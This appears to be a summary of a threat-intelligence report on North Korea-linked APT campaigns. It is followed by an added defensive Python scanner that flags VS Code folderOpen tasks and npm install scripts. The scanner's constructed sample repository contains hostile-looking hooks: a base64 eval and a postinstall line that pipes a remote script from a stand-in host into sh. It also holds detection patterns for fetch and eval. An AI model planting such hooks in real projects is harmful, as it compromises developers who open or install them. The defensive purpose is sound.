January 2026 APT Group Trends Report
2026-02-12 • AhnLab • January 2026 APT Group Trends Report
AhnLab's January 2026 APT trend report highlights several DPRK-linked campaigns affecting developer, Web3, public-sector, activist, and supply-chain targets.

Lazarus is reported to have replaced blocked Pastebin infrastructure with Polygon NFT contracts as a dead-drop mechanism for retrieving payload or C2 data. Initial execution in developer environments combined two auto-run hooks: VS Code tasks configured to run on folderOpen (so the task fires as soon as a cloned project is opened) and hijacked npm lifecycle scripts (so the payload runs during npm install). The activity included modular stealers aimed at cryptocurrency wallets, password managers, SSH keys, API credentials, and cryptocurrency assets.

Andariel is described using TigerRAT, StarshellRAT, JelusRAT, GopherRAT, web shells, credential-dumping tools, BYOVD (bring-your-own-vulnerable-driver), scheduled tasks, and abuse of ERP update chains against European public and legal organizations and customers of Korean ERP software.

Kimsuky targeted a South Korean activist working on North Korea-related issues through MEGA-hosted spear phishing, LNK and PowerShell execution, Dropbox-based C2, concealed AnyDesk remote access, scheduled tasks, and theft of system information.
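The two developer-side hooks attributed to Lazarus above (VS Code tasks with runOn: folderOpen, and npm lifecycle scripts that execute during npm install) are both declared in plain files inside the repository, so they can be checked before a cloned project is opened or installed. The following is an added example, not code from the AhnLab report: a pre-flight scanner that parses .vscode/tasks.json and package.json, reports every auto-executing hook, and tags the command with simple indicator heuristics. The sample repository it builds, the indicator patterns, and the example.invalid URL are constructed for illustration; they are not indicators from the report.

```python
"""Added example (not from AhnLab's report): pre-flight check for a freshly cloned
repository that flags VS Code tasks set to run on folderOpen and npm lifecycle
scripts that run during `npm install`. Sample repo contents are constructed."""
import json
import os
import re
import tempfile

# npm lifecycle scripts that run automatically during `npm install`.
NPM_AUTO_SCRIPTS = ("preinstall", "install", "postinstall", "prepare")

# Constructed heuristics for what a hijacked hook typically does; not a complete list.
SUSPICIOUS = [
    (r"\bcurl\b|\bwget\b|\bInvoke-WebRequest\b|\biwr\b", "network fetch"),
    (r"\beval\b|Function\(|child_process", "dynamic execution"),
    (r"base64|from_base64|\\x[0-9a-f]{2}", "encoded payload"),
    (r"node\s+-e\s", "inline node script"),
]

def _strip_json_comments(text):
    # VS Code config files are JSONC; drop /* */ and // comment lines before parsing.
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"^\s*//.*$", "", text, flags=re.M)

def _classify(cmd):
    return [label for pat, label in SUSPICIOUS if re.search(pat, cmd, re.I)]

def check_vscode_tasks(repo):
    """Flag tasks in .vscode/tasks.json whose runOptions.runOn is folderOpen."""
    path = os.path.join(repo, ".vscode", "tasks.json")
    findings = []
    if not os.path.isfile(path):
        return findings
    with open(path, encoding="utf-8") as f:
        data = json.loads(_strip_json_comments(f.read()))
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            cmd = " ".join([task.get("command", "")] + list(task.get("args", [])))
            findings.append({"source": ".vscode/tasks.json",
                             "name": task.get("label", "<unnamed>"),
                             "command": cmd, "indicators": _classify(cmd)})
    return findings

def check_npm_scripts(repo):
    """Flag package.json lifecycle scripts that execute during npm install."""
    path = os.path.join(repo, "package.json")
    findings = []
    if not os.path.isfile(path):
        return findings
    with open(path, encoding="utf-8") as f:
        scripts = json.load(f).get("scripts", {})
    for name in NPM_AUTO_SCRIPTS:
        if name in scripts:
            findings.append({"source": "package.json", "name": name,
                             "command": scripts[name],
                             "indicators": _classify(scripts[name])})
    return findings

def scan_repo(repo):
    """Return every auto-executing hook found; an empty list means no hooks."""
    return check_vscode_tasks(repo) + check_npm_scripts(repo)

def build_sample_repo():
    """Construct a throwaway repo with one benign task and two suspicious hooks."""
    repo = tempfile.mkdtemp(prefix="repo-")
    os.makedirs(os.path.join(repo, ".vscode"))
    tasks = {"version": "2.0.0", "tasks": [
        {"label": "lint", "type": "shell", "command": "npm run lint"},
        {"label": "setup", "type": "shell", "command": "node",
         "args": ["-e", "eval(Buffer.from('...','base64').toString())"],
         "runOptions": {"runOn": "folderOpen"}},
    ]}
    with open(os.path.join(repo, ".vscode", "tasks.json"), "w", encoding="utf-8") as f:
        f.write("// constructed sample tasks.json\n" + json.dumps(tasks))
    pkg = {"name": "demo", "scripts": {
        "test": "jest",
        "postinstall": "curl -s https://example.invalid/p.sh | sh",  # constructed
    }}
    with open(os.path.join(repo, "package.json"), "w", encoding="utf-8") as f:
        json.dump(pkg, f)
    return repo

if __name__ == "__main__":
    for hit in scan_repo(build_sample_repo()):
        print(f"[{hit['source']}] {hit['name']}: {hit['command']} -> {hit['indicators']}")
```

Two practical caveats: the indicator tags are only a triage aid, and a hook with no tags still deserves a read before the folder is opened. On the prevention side, opening an unfamiliar clone in VS Code's Workspace Trust restricted mode stops automatic tasks from running, and `npm install --ignore-scripts` skips the lifecycle scripts entirely, which is the safer default for untrusted projects.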